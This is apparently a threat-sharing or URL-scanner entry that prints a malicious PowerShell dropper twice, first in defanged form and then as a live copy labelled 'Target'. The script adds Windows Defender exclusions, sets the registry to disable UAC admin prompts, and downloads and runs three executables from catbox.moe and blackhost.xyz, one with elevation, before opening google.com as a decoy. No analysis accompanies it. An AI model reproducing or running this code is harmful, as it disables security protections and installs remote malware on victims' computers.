hxxp://$items = @() Start-Process PowerShell -ArgumentList '-ExecutionPolicy Bypass -Add-MpPreference -ExclusionPath $Env[:]ProgramData, $env[:]TEMP, $env[:]HOMEDRIVE Set-ItemProperty -Path "HKLM[:]\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 0 -Type DWord' -Verb RunAs # Define the URL for the first payload $deRooter = "hxxps://files[.]catbox[.]moe/cfuoi8[.]fuk" $IBOd8 = Join-Path $Env[:]ProgramData 'IBOd8[.]exe' # Download and execute the first payload Invoke-WebRequest -Uri $deRooter -OutFile $IBOd8 Start-Process $IBOd8 $items += $IBOd8 # Define the URL for the second payload $subPayload0 = "hxxps://www[.]blackhost[.]xyz/srv/fup/uploads/CMakerV430030[.]gz" $ndstU0 = Join-Path $Env[:]ProgramData 'SVndstU0[.]exe' # Try to download and execute the second payload try { Invoke-WebRequest -Uri $subPayload0 -OutFile $ndstU0 Start-Process $ndstU0 } catch { Write-Host '' } # Define the URL for the third payload $rooter = "hxxps://files[.]catbox[.]moe/n8nug3[.]fuck" $LKIMe = Join-Path $Env[:]ProgramData 'LKIMe[.]exe' # Try to download and execute the third payload Invoke-WebRequest -Uri $rooter -OutFile $LKIMe Start-Process $LKIMe -Verb RunAs # Sleep for 3 seconds Start-Sleep -Seconds 3 Start-Process "hxxps://google[.]com" try { cmd[.]exe /c start %appdata% } catch {}

Sharing

Target

http://$items = @() Start-Process PowerShell -ArgumentList '-ExecutionPolicy Bypass -Add-MpPreference -ExclusionPath $Env:ProgramData, $env:TEMP, $env:HOMEDRIVE Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 0 -Type DWord' -Verb RunAs # Define the URL for the first payload $deRooter = "https://files.catbox.moe/cfuoi8.fuk" $IBOd8 = Join-Path $Env:ProgramData 'IBOd8.exe' # Download and execute the first payload Invoke-WebRequest -Uri $deRooter -OutFile $IBOd8 Start-Process $IBOd8 $items += $IBOd8 # Define the URL for the second payload $subPayload0 = "https://www.blackhost.xyz/srv/fup/uploads/CMakerV430030.gz" $ndstU0 = Join-Path $Env:ProgramData 'SVndstU0.exe' # Try to download and execute the second payload try { Invoke-WebRequest -Uri $subPayload0 -OutFile $ndstU0 Start-Process $ndstU0 } catch { Write-Host '' } # Define the URL for the third payload $rooter = "https://files.catbox.moe/n8nug3.fuck" $LKIMe = Join-Path $Env:ProgramData 'LKIMe.exe' # Try to download and execute the third payload Invoke-WebRequest -Uri $rooter -OutFile $LKIMe Start-Process $LKIMe -Verb RunAs # Sleep for 3 seconds Start-Sleep -Seconds 3 Start-Process "https://google.com" try { cmd.exe /c start %appdata% } catch {}